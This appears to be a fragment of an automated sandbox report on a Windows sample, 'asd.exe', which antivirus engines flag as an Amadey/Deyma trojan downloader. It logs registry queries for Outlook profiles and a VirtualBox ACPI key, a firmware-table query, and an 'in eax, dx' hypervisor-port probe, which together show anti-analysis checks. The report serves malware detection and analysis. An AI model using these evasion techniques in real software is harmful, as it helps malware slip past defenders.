registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
3221225507 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 85 e1 ff ff c3 e9 9e e1 ff ff 3f 05 05 87
exception.symbol: asd+0x31b875
exception.instruction: in eax, dx
exception.module: asd.exe
exception.exception_code: 0xc0000096
exception.offset: 3258485
exception.address: 0xf9b875
registers.esp: 3735092
registers.edi: 6762965
registers.eax: 1447909480
registers.ebp: 13398016
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 13
registers.ecx: 10
1 0 0
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.46502686
FireEye Generic.mg.8b7f7f3857dd6194
ALYac Trojan.GenericKD.46503500
Cylance Unsafe
Sangfor Trojan.Win32.Deyma.vho
K7AntiVirus Riskware ( 0040eff71 )
BitDefender Trojan.GenericKD.46502686
K7GW Riskware ( 0040eff71 )
Cybereason malicious.f9a0e8
BitDefenderTheta Gen:NN.ZexaF.34744.eMX@aiaIjOji
Cyren W32/Trojan.AGSH-6736
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Win32/TrojanDownloader.Amadey.B
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.vho
Alibaba TrojanDownloader:Win32/Amadey.05c3163a
Ad-Aware Trojan.GenericKD.46502686
Sophos ML/PE-A
DrWeb Trojan.Siggen13.57624
Emsisoft Trojan.GenericKD.46502686 (B)
Ikarus Trojan.Win32.Themida
Webroot W32.Trojan.Gen
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Wacatac.B!ml
Gridinsoft Trojan.Heur!.012120B1
GData Trojan.GenericKD.46502686
Cynet Malicious (score: 100)
McAfee Artemis!8B7F7F3857DD
MAX malware (ai score=84)
Panda Trj/CI.A
Rising Trojan.Generic@ML.94 (RDMK:SSLA7Fj3OHZ7B5c586eHGg)
SentinelOne Static AI - Suspicious PE
eGambit PE.Heur.InvalidSig
Fortinet PossibleThreat.PALLAS.H
MaxSecure Trojan.Malware.300983.susgen
AVG Win32:Malware-gen
Avast Win32:Malware-gen
CrowdStrike win/malicious_confidence_90% (W)